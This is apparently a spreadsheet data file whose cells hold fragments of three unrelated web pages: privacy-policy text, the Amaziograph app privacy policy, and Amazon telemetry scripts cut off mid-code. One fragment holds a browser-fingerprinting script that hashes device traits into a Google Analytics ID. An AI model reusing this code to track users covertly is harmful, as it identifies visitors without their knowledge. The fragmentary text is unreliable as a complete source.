    <t>Additional information about User&amp;#x27;s Personal DataIn addition to the information contained in this privacy policy, this Application may provide the User with additional and contextual information concerning particular services or the collection and processing of Personal Data upon request.&lt;br/&gt;System Logs and MaintenanceFor operation and maintenance purposes, this Application and any third party services may collect files that record interaction with this Application (System Logs) or use for this purpose other Personal Data (such as IP Address).Information not contained in this policyMore details concerning the collection or processing of Personal Data may be requested from the Data Controller at any time. Please see the contact information at the beginning of this document.&lt;br/&gt;&lt;strong&gt;The rights of Users&lt;/strong&gt;&lt;br/&gt;Users have the right, at any time, to know whether their Personal Data has been stored and can consult the Data Controller to learn about their contents and origin, to verify their accuracy or to ask for them to be supplemented, cancelled, updated or corrected, or for their transformation into anonymous format or to block any data held in violation of the law, as well as to oppose their treatment for any and all legitimate reasons. Requests should be sent to the Data Controller at the contact information set out above.</t>
  </si>
  <si>
    <t>This Application does not support “Do Not Track” requests.&lt;br/&gt;To determine whether any of the third party services it uses honor the “Do Not Track” requests, please read their privacy policies.&lt;br/&gt;‍&lt;br/&gt;&lt;strong&gt;Changes to this privacy policy&lt;/strong&gt;&lt;br/&gt;&lt;br/&gt;The Data Controller reserves the right to make changes to this privacy policy at any time by giving notice to its Users on this page. It is strongly recommended to check this page often, referring to the date of the last modification listed at the bottom. If a User objects to any of the changes to the Policy, the User must cease using this Application and can request that the Data Controller erase the Personal Data.</t>
  </si>
  <si>
    <t>Unless stated otherwise, the then-current privacy policy applies to all Personal Data the Data Controller has about Users.&lt;br/&gt;&lt;br/&gt;&lt;strong&gt;Information about this privacy policy&lt;/strong&gt;&lt;br/&gt;The Data Controller is responsible for this privacy policy, prepared starting from the modules provided by Iubenda and hosted on Iubenda&amp;#x27;s servers.&lt;br/&gt;Definitions and legal references&lt;br/&gt;Latest update: 20th November 2014&lt;/div&gt;&lt;script src="https://d3e54v103j8qbb.cloudfront.net/js/jquery-3.5.1.min.dc5e7f18c8.js?site=5d2372f5be882751d7af3abb" type="text/javascript" integrity="sha256-9/aliU8dGd2tb6OSsuzixeV4y/faTqgFtohetphbbj0=" crossorigin="anonymous"&gt;&lt;/script&gt;&lt;script src="https://uploads-ssl.webflow.com/5d2372f5be882751d7af3abb/js/webflow.3358f5538.js" type="text/javascript"&gt;&lt;/script&gt;&lt;!--[if lte IE 9]&gt;&lt;script src="//cdnjs.cloudflare.com/ajax/libs/placeholders/3.0.2/placeholders.min.js"&gt;&lt;/script&gt;&lt;![endif]--&gt;&lt;script&gt;
(function(a,c,b){if(typeof module!=="undefined"&amp;&amp;module.exports){module.exports=b()}else{if(typeof define==="function"&amp;&amp;define.amd){define(b)}else{c[a]=b()}}})("Fingerprint",this,function(){var a=function(b){var c,d;c=Array.prototype.forEach;d=Array.prototype.map;this.each=function(k,j,h){if(k===null){return}if(c&amp;&amp;k.forEach===c){k.forEach(j,h)}else{if(k.length===+k.length){for(var g=0,e=k.length;g&lt;e;g++){if(j.call(h,k[g],g,k)==={}){return}}}else{for(var f in k){if(k.hasOwnProperty(f)){if(j.call(h,k[f],f,k)==={}){return}}}}}};this.map=function(h,g,f){var e=[];if(h==null){return e}if(d&amp;&amp;h.map===d){return h.map(g,f)}this.each(h,function(k,i,j){e[e.length]=g.call(f,k,i,j)});return e};if(typeof</t>
  </si>
  <si>
    <t>b=="object"){this.hasher=b.hasher;this.screen_resolution=b.screen_resolution;this.screen_orientation=b.screen_orientation;this.canvas=b.canvas;this.ie_activex=b.ie_activex}else{if(typeof b=="function"){this.hasher=b}}};a.prototype={get:function(){var c=[];c.push(navigator.userAgent);c.push(navigator.language);c.push(screen.colorDepth);if(this.screen_resolution){var b=this.getScreenResolution();if(typeof b!=="undefined"){c.push(b.join("x"))}}c.push(new Date().getTimezoneOffset());c.push(this.hasSessionStorage());c.push(this.hasLocalStorage());c.push(this.hasIndexDb());if(document.body){c.push(typeof(document.body.addBehavior))}else{c.push(typeof undefined)}c.push(typeof(window.openDatabase));c.push(navigator.cpuClass);c.push(navigator.platform);c.push(navigator.doNotTrack);c.push(this.getPluginsString());if(this.canvas&amp;&amp;this.isCanvasSupported()){c.push(this.getCanvasFingerprint())}if(this.hasher){return this.hasher(c.join("###"),31)}else{return this.murmurhash3_32_gc(c.join("###"),31)}},murmurhash3_32_gc:function(j,f){var k,l,h,b,e,c,g,d;k=j.length&amp;3;l=j.length-k;h=f;e=3432918353;c=461845907;d=0;while(d&lt;l){g=((j.charCodeAt(d)&amp;255))|((j.charCodeAt(++d)&amp;255)&lt;&lt;8)|((j.charCodeAt(++d)&amp;255)&lt;&lt;16)|((j.charCodeAt(++d)&amp;255)&lt;&lt;24);++d;g=((((g&amp;65535)*e)+((((g&gt;&gt;&gt;16)*e)&amp;65535)&lt;&lt;16)))&amp;4294967295;g=(g&lt;&lt;15)|(g&gt;&gt;&gt;17);g=((((g&amp;65535)*c)+((((g&gt;&gt;&gt;16)*c)&amp;65535)&lt;&lt;16)))&amp;4294967295;h^=g;h=(h&lt;&lt;13)|(h&gt;&gt;&gt;19);b=((((h&amp;65535)*5)+((((h&gt;&gt;&gt;16)*5)&amp;65535)&lt;&lt;16)))&amp;4294967295;h=(((b&amp;65535)+27492)+((((b&gt;&gt;&gt;16)+58964)&amp;65535)&lt;&lt;16))}g=0;switch(k){case 3:g^=(j.charCodeAt(d+2)&amp;255)&lt;&lt;16;case 2:g^=(j.charCodeAt(d+1)&amp;255)&lt;&lt;8;case 1:g^=(j.charCodeAt(d)&amp;255);g=(((g&amp;65535)*e)+((((g&gt;&gt;&gt;16)*e)&amp;65535)&lt;&lt;16))&amp;4294967295;g=(g&lt;&lt;15)|(g&gt;&gt;&gt;17);g=(((g&amp;65535)*c)+((((g&gt;&gt;&gt;16)*c)&amp;65535)&lt;&lt;16))&amp;4294967295;h^=g}h^=j.length;h^=h&gt;&gt;&gt;16;h=(((h&amp;65535)*2246822507)+((((h&gt;&gt;&gt;16)*2246822507)&amp;65535)&lt;&lt;16))&amp;4294967295;h^=h&gt;&gt;&gt;13;h=((((h&amp;65535)*3266489909)+((((h&gt;&gt;&gt;16)*3266489909)&amp;65535)&lt;&lt;16)))&amp;4294967295;h^=h&gt;&gt;&gt;16;return h&gt;&gt;&gt;0},hasLocalStorage:function(){try{return !! window.localStorage}catch(b){return</t>
  </si>
  <si>
    <t>true}},hasSessionStorage:function(){try{return !!window.sessionStorage}catch(b){return true}},hasIndexDb:function(){try{return !!window.indexedDB}catch(b){return true}},isCanvasSupported:function(){var b=document.createElement("canvas");return !!</t>
  </si>
  <si>
    <t>(b.getContext&amp;&amp;b.getContext("2d"))},isIE:function(){if(navigator.appName==="Microsoft Internet Explorer"){return true}else{if(navigator.appName==="Netscape"&amp;&amp;/Trident/.test(navigator.userAgent)){return true}}return false},getPluginsString:function(){if(this.isIE()&amp;&amp;this.ie_activex){return this.getIEPluginsString()}else{return this.getRegularPluginsString()}},getRegularPluginsString:function(){return this.map(navigator.plugins,function(c){var b=this.map(c,function(d){return[d.type,d.suffixes].join("~")}).join(",");return[c.name,c.description,b].join("::")},this).join(";")},getIEPluginsString:function(){if(window. ActiveXObject){var b=["ShockwaveFlash. ShockwaveFlash","AcroPDF.PDF","PDF.PdfCtrl","QuickTime.</t>
  </si>
  <si>
    <t>QuickTime","rmocx. RealPlayer G2 Control","rmocx. RealPlayer G2 Control.1","RealPlayer.</t>
  </si>
  <si>
    <t>RealPlayer(tm) ActiveX Control (32-bit)","RealVideo.RealVideo(tm)</t>
  </si>
  <si>
    <t>ActiveX Control (32-bit)","RealPlayer","SWCtl.SWCtl","WMPlayer. OCX","AgControl.</t>
  </si>
  <si>
    <t>AgControl","Skype. Detection"];return this.map(b,function(c){try{new ActiveXObject(c);return c}catch(d){return null}}).join(";")}else{return""}},getScreenResolution:function(){var b;if(this.screen_orientation){b=(screen.height&gt;screen.width)?[screen.height,screen.width]:[screen.width,screen.height]}else{b=[screen.height,screen.width]}return b},getCanvasFingerprint:function(){var d=document.createElement("canvas");var c=d.getContext("2d");var b="http://valve.github.io";c.textBaseline="top";c.font="14px 'Arial'";c.textBaseline="alphabetic";c.fillStyle="#f60";c.fillRect(125,1,62,20);c.fillStyle="#069";c.fillText(b,2,15);c.fillStyle="rgba(102, 204, 0, 0.7)";c.fillText(b,4,17);return d.toDataURL()}};return a});&lt;/script&gt;
&lt;script&gt;
  (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
  (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
  m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
  })(window,document,'script','//www.google-analytics.com/analytics.js','ga');
  ga('create', 'UA-115300763-1', {
    'storage': 'none',
    'clientId': new Fingerprint().get()
  });
  ga('set', 'anonymizeIp', true);
  ga('send', 'pageview');
&lt;/script&gt;&lt;/body&gt;&lt;/html&gt;</t>
  </si>
  <si>
    <t>&lt;!DOCTYPE html&gt;
&lt;html lang="en"&gt;&lt;head&gt;
  &lt;meta charset="utf-8"&gt;
  &lt;meta http-equiv="X-UA-Compatible" content="IE=edge"&gt;
  &lt;meta name="viewport" content="width=device-width, initial-scale=1"&gt;
  &lt;meta name="apple-itunes-app" 	content="app-id=586076398"&gt;&lt;!-- Begin Jekyll SEO tag v2.6.1 --&gt;
&lt;title&gt;Amaziograph | Create amazing mandalas and tessellations&lt;/title&gt;
&lt;meta name="generator" content="Jekyll v3.8.6" /&gt;
&lt;meta property="og:title" content="Amaziograph" /&gt;
&lt;meta property="og:locale" content="en_US" /&gt;
&lt;meta name="description" content="Create amazing mandalas and tessellations" /&gt;
&lt;meta property="og:description" content="Create amazing mandalas and tessellations" /&gt;
&lt;link rel="canonical" href="http://localhost:4000/amaziograph_privacy_policy/" /&gt;
&lt;meta property="og:url" content="http://localhost:4000/amaziograph_privacy_policy/" /&gt;
&lt;meta property="og:site_name" content="Amaziograph" /&gt;
&lt;script type="application/ld+json"&gt;
{"description":"Create amazing mandalas and tessellations","@type":"WebPage","url":"http://localhost:4000/amaziograph_privacy_policy/","headline":"Amaziograph","@context":"https://schema.org"}&lt;/script&gt;
&lt;!-- End Jekyll SEO tag --&gt;
&lt;link rel="stylesheet" href="/assets/main.css"&gt;&lt;link type="application/atom+xml" rel="alternate" href="http://localhost:4000/feed.xml" title="Amaziograph" /&gt;&lt;/head&gt;
&lt;body&gt;&lt;header class="site-header" role="banner"&gt;
  &lt;div class="wrapper"&gt;&lt;a class="site-title" rel="author" href="/"&gt;
      &lt;img src="/static/icon-40@2x.png" class="appIcon"&gt;
      Amaziograph
    &lt;/a&gt;
    &lt;input type="checkbox" id="nav-trigger" class="nav-trigger" /&gt;
    &lt;label for="nav-trigger"&gt;
      &lt;span class="menu-icon"&gt;
        &lt;svg viewBox="0 0 18 15" width="18px" height="15px"&gt;
          &lt;path d="M18,1.484c0,0.82-0.665,1.484-1.484,1.484H1.484C0.665,2.969,0,2.304,0,1.484l0,0C0,0.665,0.665,0,1.484,0 h15.032C17.335,0,18,0.665,18,1.484L18,1.484z M18,7.516C18,8.335,17.335,9,16.516,9H1.484C0.665,9,0,8.335,0,7.516l0,0 c0-0.82,0.665-1.484,1.484-1.484h15.032C17.335,6.031,18,6.696,18,7.516L18,7.516z M18,13.516C18,14.335,17.335,15,16.516,15H1.484 C0.665,15,0,14.335,0,13.516l0,0c0-0.82,0.665-1.483,1.484-1.483h15.032C17.335,12.031,18,12.695,18,13.516L18,13.516z"/&gt;
        &lt;/svg&gt;
      &lt;/span&gt;
    &lt;/label&gt;
    &lt;nav class="site-nav"&gt;&lt;a class="page-link" 
         href="/about/"&gt;
        About
      &lt;/a&gt;&lt;a class="page-link" 
         href="/faq/"&gt;
        FAQ
      &lt;/a&gt;&lt;a class="page-link" 
         href="/education/"&gt;
        Education
      &lt;/a&gt;&lt;a class="page-link" 
         href="/manual/"&gt;
        Handbook
      &lt;/a&gt;&lt;a class="page-link" 
         href="/tips_and_tricks/"&gt;
        AmazioTricks
      &lt;/a&gt;&lt;/nav&gt;&lt;/div&gt;
&lt;/header&gt;
&lt;main class="page-content" aria-label="Content"&gt;
      &lt;div class="wrapper"&gt;
        &lt;article class="post"&gt;
  &lt;header class="post-header"&gt;
    &lt;h1 class="post-title"&gt;&lt;/h1&gt;
  &lt;/header&gt;
  &lt;div class="post-content"&gt;
    &lt;h1 id="amaziogrpah-privacy-policy"&gt;Amaziogrpah Privacy policy&lt;/h1&gt;
&lt;p&gt;version 2, valid from 1-AUG-2022&lt;/p&gt;
&lt;p&gt;Amaziograph Ltd (“us”, “we”, or “our”) operates https://amaziograph.com, https://
www.facebook.com/amaziograph/, https://www.instagram.com/amaziographapp/?hl=en and sells Amaziograph app for iOS, Android and Windows operating systems via on-line stores: App Store, Google Play and Microsoft Store.&lt;/p&gt;
&lt;h1 id="1-privacy-data-collection-and-use"&gt;1. Privacy data collection and use&lt;/h1&gt;
&lt;p&gt;</t>
  </si>
  <si>
    <t>We have a great respect to the privacy and our Amaziograph app does not collect, store and share any Personal Information.&lt;/p&gt;
 &lt;p&gt;Generated by Amaziograph app files do not contain any information about the user that has created it. Therefore, for artworks created by students in the class room, it is only possible the students or their teachers or guardians to reveal the author of the artworks.&lt;/p&gt;
&lt;p&gt;</t>
  </si>
  <si>
    <t>We use Personal Information only to support Amaziograph app users and visitors of our website, Facebook and Instagram pages.&lt;/p&gt;
&lt;p&gt; We do not share any Personal Information, collected by us with any third parties.&lt;/p&gt;
&lt;p&gt; By sending e-mail to us, publishing a post on our Facebook or Instagram page, you agree to the collection and use of information in accordance with this policy.&lt;/p&gt;
&lt;p&gt;Our website does not use cookies to collect any Personal Information through cookies.</t>
  </si>
  <si>
    <t>Our website www.amaziograph.com uses only Google analytics (https://policies.google.com/privacy?hl=en-US)&lt;/p&gt;
&lt;h1 id="2-scope-of-privacy-policy"&gt;2. Scope of privacy policy&lt;/h1&gt;
&lt;p&gt; The scope of the policy covers information provided by e-mail to our company’s mails (&lt;xxxx&gt;@amaziograph.com) and posts on our Facebook and Instagram pages.&lt;/xxxx&gt;&lt;/p&gt;
&lt;p&gt;The control of execution of the Privacy Policy is delighted to our Data Protection Officer (DPO).&lt;/p&gt;
&lt;p&gt;Our privacy policy does not cover any personal sharing of artworks created with Amaziograph app.</t>
  </si>
  <si>
    <t>The users have full rights to their artworks, created with Amaziograph app and they can share them using the standard iOS, Android and Microsoft features. Any personal information drawn on the user’s artwork, like signature, name, addresses is not a subject of this policy.&lt;/p&gt;
&lt;p&gt; Our privacy policy does not cover reviews published on App Store, Google Play or Microsoft Store.&lt;/p&gt;
&lt;p&gt;</t>
  </si>
  <si>
    <t>Every person that has send e-mail to us or has published a post has rights to contact our DPO and request deleting of all available Personal Information. The DPO will inform the user in two business days that all available information, like mails and posts has been deleted.&lt;/p&gt;
&lt;p&gt;We store e-mail addresses of all Beta testers and use them only for purposes of current and future Beta testing.&lt;/p&gt;
&lt;p&gt; We do not use Personnel Information to send any news or advertisement messages.&lt;/p&gt;
&lt;p&gt;</t>
  </si>
  <si>
    <t>We keep all mails sent to &lt;xxxx&gt;@amaziograph.com for period of one year and delete after that.&lt;/xxxx&gt;&lt;/p&gt;
&lt;p&gt;We keep all visitors post and messages on our Facebook and Instagram page forever and they are public available.&lt;/p&gt;
&lt;p&gt; We share external content on our Facebook page only with author permission.&lt;/p&gt;
&lt;p&gt;As moderator of our Facebook and Instagram pages we have rights to remove any content that is not linked to Amaziograph app or contains any form of violence, pornography, sexual harassment, political statements, racism or child abuse.&lt;/p&gt;
&lt;p&gt; We do not publish any Personnel Information on our Facebook and Instagram pages without written permission of the person.&lt;/p&gt;
&lt;p&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">We are not responsible for any Personal Information, if it is published by a person in a post on our Facebook or Instagram pages.&lt;/p&gt;
&lt;h1 id="3-changes-to-the-privacy-policy"&gt;3. Changes to the Privacy policy&lt;/h1&gt;
&lt;p&gt; This Privacy Policy is effective as of 01-AUG-2022 and will remain in effect except with respect to any changes in its provisions in the future, which will be in effect immediately after being posted on www.amaizograph.com.
</t>
  </si>
  <si>
    <t>We reserve the right to update or change our Privacy Policy at any time and you should check this Privacy Policy periodically. Your continued use of the Amaziograph app after we post any modifications to the Privacy Policy on this page will constitute your acknowledgment of the modifications and your consent to abide and be bound by the modified Privacy Policy.&lt;/p&gt;
&lt;h1 id="4-data-protection-officer-dpo-contacts"&gt;4. Data protection officer (DPO) contacts&lt;/h1&gt;
&lt;p&gt;Svetoslav Staykov
support@amaziograph.com&lt;/p&gt;
  &lt;/div&gt;
&lt;/article&gt;
      &lt;/div&gt;
    &lt;/main&gt;
&lt;footer class="site-footer h-card"&gt;
  &lt;data class="u-url" href="/"&gt;&lt;/data&gt;
  &lt;div class="wrapper"&gt;
    &lt;div class="footer-col-wrapper"&gt;
      &lt;div class="footer-col footer-col-1"&gt;
        &lt;h2 class="footer-heading"&gt;Amaziograph&lt;/h2&gt;
        &lt;p&gt; &amp;copy; 2023 Amaziograph Ltd &lt;/p&gt;&lt;ul class="social-media-list"&gt;&lt;li&gt;&lt;a href="https://www.facebook.com/amaziograph"&gt;&lt;svg class="svg-icon"&gt;&lt;use xlink:href="/assets/minima-social-icons.svg#facebook"&gt;&lt;/use&gt;&lt;/svg&gt; &lt;span class="username"&gt;amaziograph&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="https://instagram.com/amaziographapp"&gt;&lt;svg</t>
  </si>
  <si>
    <t>class="svg-icon"&gt;&lt;use xlink:href="/assets/minima-social-icons.svg#instagram"&gt;&lt;/use&gt;&lt;/svg&gt; &lt;span class="username"&gt;amaziographapp&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="https://www.linkedin.com/company/amaziograph"&gt;&lt;svg class="svg-icon"&gt;&lt;use xlink:href="/assets/minima-social-icons.svg#linkedin"&gt;&lt;/use&gt;&lt;/svg&gt; &lt;span class="username"&gt;amaziograph&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="https://www.twitter.com/amaziograph"&gt;&lt;svg class="svg-icon"&gt;&lt;use xlink:href="/assets/minima-social-icons.svg#twitter"&gt;&lt;/use&gt;&lt;/svg&gt; &lt;span class="username"&gt;amaziograph&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;&lt;/ul&gt;
&lt;/div&gt;
      &lt;div class="footer-col footer-col-2"&gt;
&lt;p&gt;Download for: &lt;a href="https://itunes.apple.com/us/app/amaziograph/id586076398?ls=1&amp;amp;mt=8"&gt;iPad&lt;/a&gt; | &lt;a href="https://play.google.com/store/apps/details?id=com.amaziograph2.android&amp;amp;utm_source=website&amp;amp;pcampaignid=MKT-Other-global-all-co-prtnr-py-PartBadge-Mar2515-1"&gt;Android&lt;/a&gt; | &lt;a href="https://www.microsoft.com/store/apps/9nfg0mjm8p3s?ocid=badge"&gt;Windows 10&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Found a bug or have a suggestion? Let us know at &lt;a href="mailto:support@amaziograph.com"&gt;support@amaziograph.com&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt; We don’t use cookies nor do we collect any data using the app.</t>
  </si>
  <si>
    <t xml:space="preserve">See our &lt;a href="/amaziograph_privacy_policy/"&gt;Privacy Policy&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;&lt;h6&gt; 
Apple and the Apple logo are trademarks of Apple Inc., registered in the U.S. and other countries. App Store is a service mark of Apple Inc. 
&lt;p&gt;
Google Play and the Google Play logo are trademarks of Google Inc. &lt;/p&gt;&lt;/h6&gt;
&lt;/p&gt;
      &lt;/div&gt;
      &lt;div class="footer-col footer-col-3"&gt;
        &lt;a href = "https://fixthephoto.com/best-tattoo-drawing-apps.html#amaziograph-tattoo-drawing-app"&gt;&lt;img src="/static/2023_ME.png" class="invertable"&gt;
      &lt;/div&gt;
    &lt;/div&gt;
  &lt;/div&gt;
&lt;/footer&gt;
&lt;/body&gt;
&lt;/html&gt;
</t>
  </si>
  <si>
    <t>&lt;!doctype html&gt;&lt;html lang="en-us" class="a-no-js" data-19ax5a9jf="dingo"&gt;&lt;!-- sp:feature:head-start --&gt;
&lt;head&gt;&lt;script&gt;var aPageStart = (new Date()).getTime();&lt;/script&gt;&lt;meta charset="utf-8"/&gt;
&lt;!-- sp:end-feature:head-start --&gt;
&lt;!-- sp:feature:csm:head-open-part1 --&gt;
&lt;script type='text/javascript'&gt;var ue_t0=ue_t0||+new Date();&lt;/script&gt;
&lt;!--</t>
  </si>
  <si>
    <t>sp:end-feature:csm:head-open-part1 --&gt;
&lt;!-- sp:feature:cs-optimization --&gt;
&lt;meta http-equiv='x-dns-prefetch-control' content='on'&gt;
&lt;link rel="dns-prefetch" href="https://images-na.ssl-images-amazon.com"&gt;
&lt;link rel="dns-prefetch" href="https://m.media-amazon.com"&gt;
&lt;link rel="dns-prefetch" href="https://completion.amazon.com"&gt;
&lt;!-- sp:end-feature:cs-optimization --&gt;
&lt;!--</t>
  </si>
  <si>
    <t xml:space="preserve">sp:feature:csm:head-open-part2 --&gt;
&lt;script type='text/javascript'&gt;
window.ue_ihb = (window.ue_ihb || window.ueinit || 0) + 1;
if (window.ue_ihb === 1) {
var ue_csm = window,
    ue_hob = +new Date();
(function(d){var e=d.ue=d.ue||{},f=Date.now||function(){return+new Date};e.d=function(b){return f()-(b?0:d.ue_t0)};e.stub=function(b,a){if(!b[a]){var c=[];b[a]=function(){c.push([c.slice.call(arguments),e.d(),d.ue_id])};b[a].replay=function(b){for(var a;a=c.shift();)b(a[0],a[1],a[2])};b[a].isStub=1}};e.exec=function(b,a){return function(){try{return b.apply(this,arguments)}catch(c){ueLogError(c,{attribution:a||"undefined",logLevel:"WARN"})}}}})(ue_csm);
    var ue_err_chan = 'jserr-rw';
(function(d,e){function h(f,b){if(!(a.ec&gt;a.mxe)&amp;&amp;f){a.ter.push(f);b=b||{};var c=f.logLevel||b.logLevel;c&amp;&amp;c!==k&amp;&amp;c!==m&amp;&amp;c!==n&amp;&amp;c!==p||a.ec++;c&amp;&amp;c!=k||a.ecf++;b.pageURL=""+(e.location?e.location.href:"");b.logLevel=c;b.attribution=f.attribution||b.attribution;a.erl.push({ex:f,info:b})}}function l(a,b,c,e,g){d.ueLogError({m:a,f:b,l:c,c:""+e,err:g,fromOnError:1,args:arguments},g?{attribution:g.attribution,logLevel:g.logLevel}:void 0);return!1}var k="FATAL",m="ERROR",n="WARN",p="DOWNGRADED",a={ec:0,ecf:0,
pec:0,ts:0,erl:[],ter:[],buffer:[],mxe:50,startTimer:function(){a.ts++;setInterval(function(){d.ue&amp;&amp;a.pec&lt;a.ec&amp;&amp;d.uex("at");a.pec=a.ec},1E4)}};l.skipTrace=1;h.skipTrace=1;h.isStub=1;d.ueLogError=h;d.ue_err=a;e.onerror=l})(ue_csm,window);
 var ue_id = 'N08HY3V6B1H4FS8NYW64',
    ue_url = '/rd/uedata',
    ue_navtiming = 1,
    ue_mid = 'ATVPDKIKX0DER',
    ue_sid = '145-1534970-5860935',
    ue_sn = 'www.amazon.com',
    ue_furl = 'fls-na.amazon.com',
    ue_surl = 'https://unagi-na.amazon.com/1/events/com.amazon.csm.nexusclient.prod',
    ue_int = 0,
    ue_fcsn = 1,
    ue_urt = 3,
    </t>
  </si>
  <si>
    <t>ue_rpl_ns = 'cel-rpl',
    ue_ddq = 1,
    ue_fpf = '//fls-na.amazon.com/1/batch/1/OP/ATVPDKIKX0DER:145-1534970-5860935:N08HY3V6B1H4FS8NYW64$uedata=s:',
    ue_sbuimp = 1,
    ue_ibft = 0,
    ue_sswmts = 0,
    ue_jsmtf = 0,
    ue_fnt = 0,
    ue_lpsi = 6000,
    ue_no_counters = 0,
    ue_swi = 1;
var ue_viz=function(){(function(b,e,a){function k(c){if(b.ue.viz.length&lt;p&amp;&amp;!l){var a=c.type;c=c.originalEvent;/^focus./.test(a)&amp;&amp;c&amp;&amp;(c.toElement||c.fromElement||c.relatedTarget)||(a=e[m]||("blur"==a||"focusout"==a?"hidden":"visible"),b.ue.viz.push(a+":"+(+new Date-b.ue.t0)),"visible"==a&amp;&amp;(b.ue.isl&amp;&amp;q("at"),l=1))}}for(var l=0,q=b.uex,f,g,m,n=["","webkit","o","ms","moz"],d=0,p=20,h=0;h&lt;n.length&amp;&amp;!d;h++)if(a=n[h],f=(a?a+"H":"h")+"idden",d="boolean"==typeof e[f])g=a+"visibilitychange",m=(a?a+"V":"v")+
"isibilityState";k({});d&amp;&amp;e.addEventListener(g,k,0);b.ue&amp;&amp;d&amp;&amp;(b.ue.pageViz={event:g,propHid:f})})(ue_csm,ue_csm.document,ue_csm.window)};
(function(d,h,N){function H(a){return a&amp;&amp;a.replace&amp;&amp;a.replace(/^\s+|\s+$/g,"")}function u(a){return"undefined"===typeof a}function B(a,b){for(var c in b)b[v](c)&amp;&amp;(a[c]=b[c])}function I(a){try{var b=N.cookie.match(RegExp("(^| )"+a+"=([^;]+)"));if(b)return b[2].trim()}catch(c){}}function O(k,b,c){var q=(x||{}).type;if("device"!==c||2!==q&amp;&amp;1!==q)k&amp;&amp;(d.ue_id=a.id=a.rid=k,w&amp;&amp;(w=w.replace(/((.*?:){2})(\w+)/,function(a,b){return b+k})),D&amp;&amp;(e("id",D,k),D=0)),b&amp;&amp;(w&amp;&amp;(w=w.replace(/(.*?:)(\w|-)+/,function(a,
c){return c+b})),d.ue_sid=b),c&amp;&amp;a.tag("page-source:"+c),d.ue_fpf=w}function P(){var a={};return function(b){b&amp;&amp;(a[b]=1);b=[];for(var c in a)a[v](c)&amp;&amp;b.push(c);return b}}function y(d,b,c,q){q=q||+new E;var f,m;if(b||u(c)){if(d)for(m in f=b?e("t",b)||e("t",b,{}):a.t,f[d]=q,c)c[v](m)&amp;&amp;e(m,b,c[m]);return q}}function e(d,b,c){var e=b&amp;&amp;b!=a.id?a.sc[b]:a;e||(e=a.sc[b]={});"id"===d&amp;&amp;c&amp;&amp;(Q=1);return e[d]=c||e[d]}function R(d,b,c,e,f){c="on"+c;var m=b[c];"function"===typeof m?d&amp;&amp;(a.h[d]=m):m=function(){};b[c]=
function(a){f?(e(a),m(a)):(m(a),e(a))};b[c]&amp;&amp;(b[c].isUeh=1)}function S(k,b,c,q){function p(b,c){var d=[b],g=0,f={},m,h;c?(d.push("m=1"),f[c]=1):f=a.sc;for(h in f)if(f[v](h)){var q=e("wb",h),p=e("t",h)||{},n=e("t0",h)||a.t0,l;if(c||2==q){q=q?g++:"";d.push("sc"+q+"="+h);for(l in p)u(p[l])||null===p[l]||d.push(l+q+"="+(p[l]-n));d.push("t"+q+"="+p[k]);if(e("ctb",h)||e("wb",h))m=1}}!J&amp;&amp;m&amp;&amp;d.push("ctb=1");return d.join("&amp;")}function m(b,c,g,e,f){if(b){var k=d.ue_err;d.ue_url&amp;&amp;!e&amp;&amp;!f&amp;&amp;b&amp;&amp;0&lt;b.length&amp;&amp;(e=
new Image,a.iel.push(e),e.src=b,a.count&amp;&amp;a.count("postbackImageSize",b.length));w?(f=h.encodeURIComponent)&amp;&amp;b&amp;&amp;(e=new Image,b=""+d.ue_fpf+f(b)+":"+(+new E-d.ue_t0),a.iel.push(e),e.src=b):a.log&amp;&amp;(a.log(b,"uedata",{n:1}),a.ielf.push(b));k&amp;&amp;!k.ts&amp;&amp;k.startTimer();a.b&amp;&amp;(k=a.b,a.b="",m(k,c,g,1))}}function A(b){var c=x?x.type:F,d=2==c||a.isBFonMshop,c=c&amp;&amp;!d,e=a.bfini;Q||(e&amp;&amp;1&lt;e&amp;&amp;(b+="&amp;bfform=1",c||(a.isBFT=e-1)),d&amp;&amp;(b+="&amp;bfnt=1",a.isBFT=a.isBFT||1),a.ssw&amp;&amp;a.isBFT&amp;&amp;(a.isBFonMshop&amp;&amp;(a.isNRBF=0),u(a.isNRBF)&amp;&amp;
(d=a.ssw(a.oid),d.e||u(d.val)||(a.isNRBF=1&lt;d.val?0:1)),u(a.isNRBF)||(b+="&amp;nrbf="+a.isNRBF)),a.isBFT&amp;&amp;!a.isNRBF&amp;&amp;(b+="&amp;bft="+a.isBFT));return b}if(!a.paused&amp;&amp;(b||u(c))){for(var l in c)c[v](l)&amp;&amp;e(l,b,c[l]);a.isBFonMshop||y("pc",b,c);l="ld"===k&amp;&amp;b&amp;&amp;e("wb",b);var s=e("id",b)||a.id;l||s===a.oid||(D=b,ba(s,(e("t",b)||{}).tc||+e("t0",b),+e("t0",b)));var s=e("id",b)||a.id,t=e("id2",b),g=a.url+"?"+k+"&amp;v="+a.v+"&amp;id="+s,J=e("ctb",b)||e("wb",b),z;J&amp;&amp;(g+="&amp;ctb="+J);t&amp;&amp;(g+="&amp;id2="+t);1&lt;d.ueinit&amp;&amp;(g+="&amp;ic="+d.ueinit);
if(!("ld"!=k&amp;&amp;"ul"!=k||b&amp;&amp;b!=s)){if("ld"==k){try{h[K]&amp;&amp;h[K].isUeh&amp;&amp;(h[K]=null)}catch(I){}if(h.chrome)for(t=0;t&lt;L.length;t++)T(G,L[t]);(t=N.ue_backdetect)&amp;&amp;t.ue_back&amp;&amp;t.ue_back.value++;d._uess&amp;&amp;(z=d._uess());a.isl=1}a._bf&amp;&amp;(g+="&amp;bf="+a._bf());d.ue_navtiming&amp;&amp;f&amp;&amp;(e("ctb",s,"1"),a.isBFonMshop||y("tc",F,F,M));!C||a.isBFonMshop||U||(f&amp;&amp;B(a.t,{na_:f.navigationStart,ul_:f.unloadEventStart,_ul:f.unloadEventEnd,rd_:f.redirectStart,_rd:f.redirectEnd,fe_:f.fetchStart,lk_:f.domainLookupStart,_lk:f.domainLookupEnd,
